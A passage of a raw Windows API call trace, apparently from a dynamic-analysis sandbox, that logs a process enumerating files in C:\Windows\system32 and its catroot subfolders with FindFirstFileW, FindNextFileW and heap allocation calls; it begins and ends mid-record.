ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx3.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsprx3.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70aa08 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7afe96b, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc7afe96b, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81d847a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx4.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsprx4.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70aab0 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b9128, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc89b9128, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dab8a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx5.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsprx5.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70ab58 [0030.666] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91e7c91, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0xc91e7c91, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0x81dd29a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="bitsprx6.dll", cAlternateFileName="")) returned 1 [0030.666] lstrlenW (lpString="bitsprx6.dll") returned 12 [0030.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70ac00 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4251183, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4251183, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4251183, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbox.dll", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="blackbox.dll") returned 12 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70aca8 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa522d5bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0xa522d5bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="boot.sdi") returned 8 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ce22d7, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x18ce22d7, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x661e0b30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootcfg.exe", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="bootcfg.exe") returned 11 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x708280 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x325b7bbf, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x325b7bbf, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x14b259e0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTVID.DLL", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="BOOTVID.DLL") returned 11 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x708320 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa480373c, ftCreationTime.dwHighDateTime=0x1c9ea12, ftLastAccessTime.dwLowDateTime=0xa480373c, ftLastAccessTime.dwHighDateTime=0x1c9ea12, ftLastWriteTime.dwLowDateTime=0xa480373c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x59c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bopomofo.uce", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="bopomofo.uce") returned 12 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4c7c82, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d4c7c82, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d4edde3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="browcli.dll", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="browcli.dll") returned 11 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7083c0 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a679055, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a679055, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a679055, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="browseui.dll", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="browseui.dll") returned 12 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70ad50 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8455446, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8455446, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa847b5a6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9200, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthprops.cpl", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="bthprops.cpl") returned 12 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d8d73d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xd7d8d73d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x663849f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bthudtask.exe", cAlternateFileName="")) returned 1 [0030.667] lstrlenW (lpString="bthudtask.exe") returned 13 [0030.667] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9c) returned 0x70adf8 [0030.667] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf03c839e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0xf03c839e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x10400, dwReserved0=0x0, dwReserved1=0x0, cFileName="btpanui.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="btpanui.dll") returned 11 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x708460 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb31a7765, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb31a7765, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3265e46, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bubbles.scr", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="Bubbles.scr") returned 11 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a34e9a7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8a34e9a7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827c9df0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xfa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWContextHandler.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="BWContextHandler.dll") returned 20 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaa) returned 0x70c278 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8731ad6b, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x8731ad6b, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x827ee7e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BWUnpairElevated.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="BWUnpairElevated.dll") returned 20 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaa) returned 0x70c330 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2e6f4f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2e6f4f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a30d0af, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabinet.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="cabinet.dll") returned 11 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x708500 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c0def, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a2c0def, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a2c0def, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cabview.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="cabview.dll") returned 11 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7085a0 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9639a6c, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xc9639a6c, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x663abaf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cacls.exe", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="cacls.exe") returned 9 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x94) returned 0x708640 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb34a12ea, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb34a12ea, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb34ed5ab, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xbd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="calc.exe", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="calc.exe") returned 8 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x92) returned 0x7086e0 [0030.668] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe154e3d9, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe154e3d9, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829926a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xbc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capiprovider.dll", cAlternateFileName="")) returned 1 [0030.668] lstrlenW (lpString="capiprovider.dll") returned 16 [0030.668] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa2) returned 0x70c3e8 [0030.669] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f291a9a, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x3f291a9a, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x829b97a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="capisp.dll", cAlternateFileName="")) returned 1 [0030.669] lstrlenW (lpString="capisp.dll") returned 10 [0030.669] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x708780 [0030.669] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xe3986c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xc4c8bad2, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="catroot", cAlternateFileName="")) returned 1 [0030.669] lstrlenW (lpString="catroot") returned 7 [0030.669] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70c498 [0030.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\*", lpFindFileData=0x70c498 | out: lpFindFileData=0x70c498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.669] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c498 | out: lpFindFileData=0x70c498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.669] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c498 | out: lpFindFileData=0x70c498*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}", cAlternateFileName="{127D0~1")) returned 1 [0030.669] lstrlenW (lpString="{127D0A1D-4EF2-11D1-8608-00C04FC295EE}") returned 38 [0030.669] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70d6f8 [0030.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\*", lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.669] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.669] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76cc7c4b, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x76cc7c4b, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76cc7c4b, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0030.669] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.670] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d6f8 | out: hHeap=0x6d0000) returned 1 [0030.670] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x70c498 | out: lpFindFileData=0x70c498*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}", cAlternateFileName="{F750E~1")) returned 1 [0030.670] lstrlenW (lpString="{F750E6C3-38EE-11D1-85E5-00C04FC295EE}") returned 38 [0030.670] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x70d6f8 [0030.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*", lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.670] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfecc0852, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb9ae6d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xbb9ae6d0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36c8d955, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36c8d955, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x136fa600, ftLastWriteTime.dwHighDateTime=0x1cb88ea, nFileSizeHigh=0x0, nFileSizeLow=0x350c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI636C~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Hyper-V-Common-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 83 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x36b82fb3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x36b82fb3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf5a24100, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x5e64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI18AE~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 94 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5eef4f35, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x5eef4f35, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x52592800, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x3d1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MI4C4D~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 82 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28be7b78, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x28be7b78, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xc7246600, ftLastWriteTime.dwHighDateTime=0x1cb88e9, nFileSizeHigh=0x0, nFileSizeLow=0x29248, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat", cAlternateFileName="MI4AB2~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Media-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat") returned 77 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6ea88624, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x6ea88624, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x2db18000, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x23be, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat", cAlternateFileName="MIC133~1.CAT")) returned 1 [0030.677] lstrlenW (lpString="Microsoft-Windows-Anytime-Upgrade-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat") returned 89 [0030.677] FindNextFileW (in: hFindFile=0x701c80, lpFindFileData=0x70d6f8 | out: lpFindFileData=0x70d6f8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x3bce4069, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x3bce4069, 